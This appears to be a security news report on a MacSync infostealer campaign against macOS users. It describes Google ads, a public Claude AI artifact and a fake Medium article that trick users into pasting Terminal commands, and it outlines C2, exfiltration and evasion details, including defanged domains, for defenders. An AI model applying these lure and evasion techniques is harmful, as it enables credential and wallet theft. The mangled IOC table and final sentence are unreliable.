a sophisticated malware distribution campaign that uses legitimate platforms and sponsored Google search results to target macOS users. With more than 15,000 users already exposed to the malicious content, the attack uses Medium articles and Claude AI's public artifact feature to distribute the MacSync information stealer. Both of the campaign's variations use the ClickFix social engineering technique to fool users into carrying out malicious commands.

15,000 possible victims (Twitter source) When users search for "Online dns resolver," the first variant shows up as a sponsored Google search result, taking them to a public Claude AI artifact called "macOS Secure Command Execution." This phony tutorial instructs users to paste a base64-encoded command into their Terminal application while posing as a genuine security tool.

When the command is run, a loader for MacSync stealer is downloaded and launched from the temporary directory /tmp/osalogging.zip. In order to avoid detection, the malware spoofs a macOS browser User-Agent string and uses a hardcoded authentication token and API key to connect to its command-and-control server at a2abotnet[.]com/dynamic. The actual data exfiltration process is handled by Apple's scripting tool, osascript, which receives the server response directly.

MacSync targets private data, such as cryptocurrency wallets, browser data, and keychain credentials. malicious website (source: Twiiter) The stolen data is compressed into a zip file and sent via HTTP POST requests to a2abotnet[. ]com/gate by cybersecurity researchers at Moonlock Lab.

The malware uses a complex chunked upload mechanism with exponential backoff and up to eight retry attempts to ensure successful exfiltration of larger data sets. To hide its tracks, the malware deletes staging files after the upload is finished. The second variation uses a fake Medium article hosted at apple-mac-disk-space.medium[.

]com to target users who are searching for "macos cli disk space analyzer." The article presents a similar ClickFix payload with extra obfuscation layers while posing as the official Apple Support Team. The command retrieves the malicious payload from raxelpak[. ]com by evading basic pattern matching detection systems by using string concatenation techniques like cur""l. The threat actors' knowledge of social engineering and evasion tactics is evident in both variations.

Attackers can reach a larger audience while appearing legitimate by taking advantage of reputable platforms like Medium and Claude AI in addition to Google's advertising network. The campaign draws attention to the increasing practice of malware operators exploiting trustworthy services to disseminate malicious content while circumventing conventional security measures. IOC Indicator Type Indicator Description Domain a2abotnet[.

]com Payload hosting domain Domain apple-mac-disk-space.medium Domain raxelpak[. ]com Command and control server Domain[. ]com False Apple support article File Path: /tmp/osalogging.zip Data staging file Targeting macOS, the malware MacSync Information Stealer made ZeroOwl a Google Preferred Source.